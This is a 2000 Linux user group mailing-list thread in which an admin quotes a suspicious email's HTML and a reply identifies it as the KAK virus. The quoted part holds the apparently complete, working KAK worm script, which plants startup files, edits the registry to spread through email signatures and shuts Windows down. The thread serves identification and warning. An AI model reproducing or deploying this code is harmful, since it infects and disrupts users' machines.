[lug] Virus in the email....
Brian Ketelsen
briank at becos.org
Fri Jun 9 08:19:18 MDT 2000
That is the KAK virus, a little beast that lives in HTML signatures of
infected outlook / o. express clients. You can get info on it at
McAffee.com. It isn't too powerful as virii go, but it is annoying.
Brian
----- Original Message -----
From: "Ryan Kirkpatrick" <rkirkpat at nag.cs.colorado.edu>
To: <lug at lug.boulder.co.us>
Sent: Friday, June 09, 2000 7:50 AM
Subject: [lug] Virus in the email....
>
> Ok, I got an interesting email this morning, and it was not even
> really for me. It was sent to the webmaster account for the website I
> admin, which of course meant it ended up in my email box. It was really
> meant for the other people at the company I work for. I get these every
> now and again, people not realizing where to send email, so I normally
> forward them on. But this time something caught my eye as a big wrong...
> The email was in both text and HTML, and the HTML version of the email
> contained what looks like a rather long JavaScript. :(
> I have excerpted from the email below the releveant sections. The
> human-readbale contents of the email appeared perfectly normal and valid,
> so I don't think that part was forged by an computer program. But glancing
> through the script made me a bit worried. I don't even know if it is
> JavaScript or not. Might be even be a copy of one of those infamous email
> viruses going around for all I know. Anyway, can anyone shed some light on
> this?
> Don't worry, what is below should not be executable provided you
> don't copy it to an seperate file and try to load it in a web browser.
> Also, I emailed the sender warning them that their system might be
> infected and made sure that he had not sent any more emails to any of the
> addresses for the company.
>
> PS. Thank goodness for text only email readers. :)
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
> <HTML><HEAD>
> <META content=3D"text/html; charset=3Diso-8859-1" =
> http-equiv=3DContent-Type>
> <META content=3D"MSHTML 5.00.2014.210" name=3DGENERATOR>
> .........
> <DIV style=3D"POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
> <OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC=20
> id=3Dscr></OBJECT></DIV>
> <SCRIPT><!--
> function sErr(){return =
> true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"Z<HTML><HEAD><TITLE>Dr=
> iver Memory Error</"+"TITLE><HTA:APPLICATION ID=3D\"hO\" =
> WINDOWSTATE=3DMinimize></"+"HEAD><BODY BGCOLOR=3D#CCCCCC><object =
> id=3D'wsh' =
> classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIP=
> T>function sEr(){self.close();return true;}window.onerror=3DsEr;fs=3Dnew =
>
ActiveXObject('Scripting.FileSystemObject');wd=3D'C:\\\\Windows\\\\';fl=3D=
> fs.GetFolder(wd+'Applic~1\\\\Identities');sbf=3Dfl.SubFolders;for(var =
> mye=3Dnew =
> Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =
>
String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD=C9=
> ~1\\\\PROGRA~1\\\\D=C9MARR~1\\\\kak.hta';ken=3Dwd+'STARTM~1\\\\Programs\\=
> \\StartUp\\\\kak.hta';k2=3Dwd+'System\\\\'+fic+'.hta';kk=3D(fs.FileExists=
> (kfr))?kfr:ken;aek=3D'C:\\\\AE.KAK';aeb=3D'C:\\\\Autoexec.bat';if(!fs.Fil=
> eExists(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs=
> .GetFile(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr=
> )?wd+'MENUD=90~1\\\\PROGRA~1\\\\D=90MARR~1\\\\kak.hta':ken;t1.WriteLine('=
> @echo off>'+pth);t1.WriteLine('del =
> '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(=
> k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDI=
> T4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USER\\\\Identities\\\\'+id=
> n+'\\\\Software\\\\Microsoft\\\\Outlook =
> Express\\\\5.0';sg=3D'\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\=
> "Default =
> Signature\"=3D\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\=
> \\00000000]');t2.WriteLine('\"name\"=3D\"Signature =
>
#1\"');t2.WriteLine('\"type\"=3Ddword:00000002');t2.WriteLine('\"text\"=3D=
> \"\"');t2.Write('\"file\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.Wri=
> teBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature =
> Flags\"=3Ddword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCA=
> L_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]')=
> ;t2.Write('\"cAg0u\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.h=
> ta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s =
> '+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><B=
> ODY><DIV =
> style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT =
> classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC =
> id=3Dscr></"+"OBJECT></"+"DIV>');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read=
> (1)!=3D'Z');t3.WriteLine('<SCRIPT><!--');t3.write('function =
> sErr(){return =
> true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095=
> );t4.close();rd=3D/\\\\/g;re=3D/\"/g;rf=3D/<\\//g;rt=3Drs.replace(rd,'\\\=
> \\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\"=
> ;la=3D(navigator.systemLanguage)?navigator.systemLanguage:navigator.langu=
> age;scr.Path=3D(la=3D=3D\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu =
> D=E9marrer\\\\\\\\Programmes\\\\\\\\D=E9marrage\\\\\\\\kak.hta\":\"C:\\\\=
> \\\\windows\\\\\\\\Start =
> Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=3Dnavigator.user=
> Agent.toLowerCase();if(((agt.indexOf(\"msie\")!=3D-1)&&(parseInt(navigato=
> r.appVersion)>4))||(agt.indexOf(\"msie =
> 5.\")!=3D-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT>=
> </"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attribut=
> es=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dnew Date();if(d.getDate()=3D=3D1 =
> && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today =
> !');wsh.Run(wd+'RUNDLL32.EXE =
> user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc =
> failed =
> !]]%%%%%</"+"BODY></"+"HTML>";la=3D(navigator.systemLanguage)?navigator.s=
> ystemLanguage:navigator.language;scr.Path=3D(la=3D=3D"fr")?"C:\\windows\\=
> Menu D=E9marrer\\Programmes\\D=E9marrage\\kak.hta":"C:\\windows\\Start =
> Menu\\Programs\\StartUp\\kak.hta";agt=3Dnavigator.userAgent.toLowerCase()=
> ;if(((agt.indexOf("msie")!=3D-1)&&(parseInt(navigator.appVersion)>4))||(a=
> gt.indexOf("msie 5.")!=3D-1))scr.write();
> file://--></SCRIPT>
> </OBJECT></DIV></BODY></HTML>
>
>
> --------------------------------------------------------------------------
-
> | "For to me to live is Christ, and to die is gain."
|
> | --- Philippians 1:21 (KJV)
|
> --------------------------------------------------------------------------
-
> | Ryan Kirkpatrick | Boulder, Colorado | http://www.rkirkpat.net/
|
> --------------------------------------------------------------------------
-
>
>
> _______________________________________________
> Web Page: http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
More information about the LUG
mailing list